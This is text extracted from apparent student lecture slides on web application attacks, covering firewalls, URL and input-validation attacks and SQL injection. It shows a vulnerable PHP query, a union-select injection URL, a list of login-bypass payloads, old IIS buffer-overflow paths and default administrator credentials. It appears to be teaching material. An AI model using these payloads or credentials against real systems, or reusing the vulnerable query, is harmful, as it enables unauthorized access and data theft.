Professional Documents
Culture Documents
Team :
-
(1312530247)
Ronny Tanjung
Wirawan Satyadi
(1311530230)
Muhammad Fahmi
(1312530148)
(1311530404)
Bayu Laksono
Rian Nurjaman
Husein Allmasyhur
Rudi Fredrick
(1311530263)
(1311530396)
(1311530107)
(1311530123)
(1311530214)
(0911530335)
SQL
Database
Firewall
Web app
Web
Server
Web app
Web app
DB
DB
Web app
HTTP reply
(HTML,
Javascript,
VBscript,
etc)
Apache
IIS
Netscape
etc
Plugins:
Perl
C/C++
JSP, etc
Database
connection:
ADO,
ODBC, etc.
Utility of Firewalls
Hacks on OS
network services
prevented by
firewalls.
Web app
Web
Server
wu-ftpd
X
Sun RPC
X
NT ipc$
Web app
Web app
Web app
DB
DB
Web
Client
Web
Server
URL Interpretation
Attacks.
web server
misconfiguration
Web app
Web
Client
Web
Server
Web app
Web app
Web app
Input Validation
attacks.
URL
Interpretation
attacks
poor
checking
of user
inputs
Web app
Web
Client
Web
Server
Web app
Web app
DB
DB
Web app
SQL Query
Poisoning
URL
Interpretation
attacks
Input
Validation
attacks
Extend SQL
statements
Web
Client
Web
Server
Web app
Web app
DB
DB
Web app
HTTP session
hijacking.
Impersonation.
URL
Interpretation
attacks
Input
Validation
attacks
SQL query
poisoning
URL Injection
Client Side
URL :
http://localhost/ronie/uas/index.php?
status=detail&id=40
Server Side
$ID = $_GET['id'];
$hasil = mysql_query("SELECT * FROM news WHERE ID = $ID order
by id desc");
URL Injection
Client Side
URL :
http://localhost/ronie/uas/index.php?status=detail&id=40 union select all
1,table_name,3,4,5,6 from information_schema.tables where
table_schema=database()--
Server Side
SELECT * FROM news WHERE ID = 40 union select all
1,table_name,3,4,5,6 from information_schema.tables where
table_schema=database()-- order by id desc
SQL Injection
MySQL Application
Bob
Password: MyPass123
Intern
Intern
et
et
APACHE Server
login_script2.php
Select * from
User_Table
where
user=%user
and
pass=%pass
My SQL Server
Select * from
User_Table where
user=Bob
and
pass=MyPass123
M
Y
S
Q
L
L
I
B
R
A
R
Y
MySQL Injection
Username: or 1=1--
My SQL Server
Password:
Intern
Intern
et
et
APACHE Server
login_script2.php
Select * from
User_Table
where
user=%user
and
pass=%pass
Select * from
User_Table
where
users= or
1=1-- and
pass=
M
Y
S
Q
L
L
I
B
R
A
R
Y
Login box
A common query:
SELECT * from table WHERE id=$id
We could inject some malicious query in this
way:
http://www.host.com/file?
id="malicious_code"
' or 'x'='x
" or "a"="a
hi') or ('a'='a
' or 0=0 --
" or "x"="x
') or ('a'='a
hi") or ("a"="a
" or 0=0 --
') or ('x'='x
") or ("a"="a
or 0=0 --
' or 1=1--
hi" or "a"="a
' or 0=0 #
" or 1=1--
hi" or 1=1 --
" or 0=0 #
or 1=1--
hi' or 1=1 --
or 0=0 #
' or a=a--
hi' or 'a'='a
Directory Browsing
Directory Browsing
Application Default
Application Default
Application Default
Printer Buffer Overflow
http://www.zzzz.com /null.printer
FrontPage Server Extensions Buffer Overflow
http://www.zzzz.com /_vti_bin/_vti_aut/fp30reg.dll
Compaq Insight Manager (CIM)
http://www.zzzz.com:2301
username:password
administratror:administrator
administrator:[Null]
operator:operator
Statistics
/usage, /stat, /webstat, /wwwstats
Search Queries
Search
Queries
THE END